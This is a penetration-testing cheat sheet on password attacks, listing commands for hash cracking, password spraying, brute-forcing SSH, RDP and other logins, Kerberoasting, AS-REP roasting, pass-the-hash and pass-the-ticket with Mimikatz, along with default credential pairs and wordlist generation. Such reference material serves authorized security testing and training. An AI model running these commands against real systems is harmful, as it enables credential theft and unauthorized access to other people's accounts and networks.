Password Attacks
Attacking authentication mechanisms using discovered or captured credentials. For finding exposed credentials in repositories and code, see Credential Hunting.
Hash Cracking
John the Ripper
# Crack with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Crack specific hash type
john --format=NT --wordlist=rockyou.txt hashes.txt
# Show cracked passwords
john --show hashes.txt
# Incremental mode
john --incremental hashes.txt
# Rules
john --wordlist=rockyou.txt --rules hashes.txt
# Crack shadow file
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=rockyou.txt unshadowed.txt
Hashcat
# Crack MD5
hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# Crack NTLM
hashcat -m 1000 -a 0 hashes.txt rockyou.txt
# Crack with rules
hashcat -m 0 -a 0 hashes.txt rockyou.txt -r rules/best64.rule
# Brute force
hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a
# Show cracked
hashcat -m 0 hashes.txt --show
# Common hash modes:
# 0 = MD5
# 100 = SHA1
# 1000 = NTLM
# 1400 = SHA256
# 1700 = SHA512
# 1800 = sha512crypt
# 3200 = bcrypt
# 13100 = Kerberos 5 TGS-REP
Password Spraying
CrackMapExec
# SMB password spray
crackmapexec smb target.com -u users.txt -p 'Password123'
# Multiple passwords
crackmapexec smb target.com -u users.txt -p passwords.txt
# Successful logins only
crackmapexec smb target.com -u users.txt -p 'Password123' --continue-on-success
Hydra
# HTTP POST
hydra -L users.txt -P passwords.txt target.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
# SSH
hydra -L users.txt -P passwords.txt ssh://target.com
# FTP
hydra -L users.txt -P passwords.txt ftp://target.com
# SMB
hydra -L users.txt -P passwords.txt smb://target.com
# RDP
hydra -L users.txt -P passwords.txt rdp://target.com
# MySQL
hydra -L users.txt -P passwords.txt mysql://target.com
Kerbrute
# User enumeration
./kerbrute userenum -d domain.local --dc dc.domain.local users.txt
# Password spray
./kerbrute passwordspray -d domain.local --dc dc.domain.local users.txt 'Password123'
# Brute force
./kerbrute bruteuser -d domain.local --dc dc.domain.local passwords.txt username
Kerberoasting
# Request TGS tickets (Impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.10 -request
# Save to file
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile kerberoast.txt
# Crack with hashcat
hashcat -m 13100 kerberoast.txt rockyou.txt
# PowerView
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
AS-REP Roasting
# Get AS-REP hashes (Impacket)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip 10.10.10.10
# With credentials
impacket-GetNPUsers domain.local/user:password -dc-ip 10.10.10.10
# Crack with hashcat
hashcat -m 18200 asrep.txt rockyou.txt
Pass-the-Hash
# Impacket psexec
impacket-psexec -hashes :NTHASH administrator@target.com
# CrackMapExec
crackmapexec smb target.com -u administrator -H NTHASH
# Evil-WinRM
evil-winrm -i target.com -u administrator -H NTHASH
# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:NTHASH /run:cmd
Pass-the-Ticket
# Export tickets (Mimikatz)
sekurlsa::tickets /export
# Import ticket
kerberos::ptt ticket.kirbi
# List tickets
klist
Default Credentials
Common Defaults
admin:admin
admin:password
root:root
root:toor
administrator:administrator
tomcat:tomcat
admin:Admin123
admin:Password123
Online Resources
Wordlist Generation
CeWL
# Generate wordlist from website
cewl http://target.com -w wordlist.txt
# Minimum word length
cewl http://target.com -m 6 -w wordlist.txt
# Include email addresses
cewl http://target.com -e -w wordlist.txt
Crunch
# Generate wordlist
crunch 8 8 -t @@@@%%%% -o wordlist.txt
# @ = lowercase
# , = uppercase
# % = numbers
# ^ = symbols
# Generate with pattern
crunch 6 8 0123456789 -o numbers.txt
# Generate with specific characters
crunch 4 4 abcd123 -o wordlist.txt